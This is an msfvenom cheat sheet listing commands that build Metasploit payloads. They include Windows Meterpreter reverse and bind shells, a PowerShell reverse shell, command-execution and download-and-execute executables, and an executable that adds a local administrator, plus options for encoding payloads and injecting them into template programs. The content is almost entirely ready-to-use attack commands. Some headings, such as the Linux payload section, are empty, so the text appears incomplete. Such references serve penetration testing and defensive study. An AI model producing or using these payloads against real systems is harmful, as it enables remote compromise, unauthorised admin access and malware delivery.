The msfvenom cheat sheet should give you an overview of the most important msfvenom commands. Some of the commands listed below may need to be customized to meet your specific requirements.


Set the LHOST

Set the LPORT

Set the RHOST

List options


List all the available payloads

msfvenom -l payloads


List all the available encoders

msfvenom -l encoders

Generating a payload

The general structure of an msfvenom command looks like this:

msfvenom -p <PAYLOAD> -a <x86/x64> --platform <platform> -e <encoding> -f <output-format>

It's also possible to use a custom payload. Generate the custom payload first, then pipe it into msfvenom with cat and set the payload flag (-p) to "-" so that it is read from stdin.

cat custom-payload.bin | msfvenom -p - -a <x86/x64> --platform <platform> -e <encoding> -f <output-format>

Common Windows payloads

Meterpreter reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listen-ip> LPORT=<listen-port> -f exe > reverse-shell.exe

Meterpreter bind shell

msfvenom -p windows/meterpreter/bind_tcp RHOST=<remote-ip> LPORT=<listen-port> -f exe > bind-shell.exe

Meterpreter reverse PowerShell shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<listen-ip> LPORT=<listen-port> -f psh -o meterpreter-powershell64.ps1

Execute command

msfvenom -p windows/exec CMD=<command-to-execute> -f exe > command.exe

Download and execute

msfvenom -p windows/download_exec URL=<url-to-executable> EXE=<filename-to-save-and-run> -f exe > command.exe

Add admin user

Creates a user and adds it to the local administrators group.
Keep in mind that the password must still meet the local administrator password requirements: 8-14 chars (1 UPPER, 1 lower, 1 digit/special).

msfvenom -p windows/adduser USER=<username> PASS=<password> -f exe > adduser.exe

Common Linux payloads

msfvenom options

    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Additional information

This msfvenom cheat sheet may not be complete. Check the references to see whether additional options fit your needs.

msfvenom replaced msfpayload and msfencode as of June 8th 2015.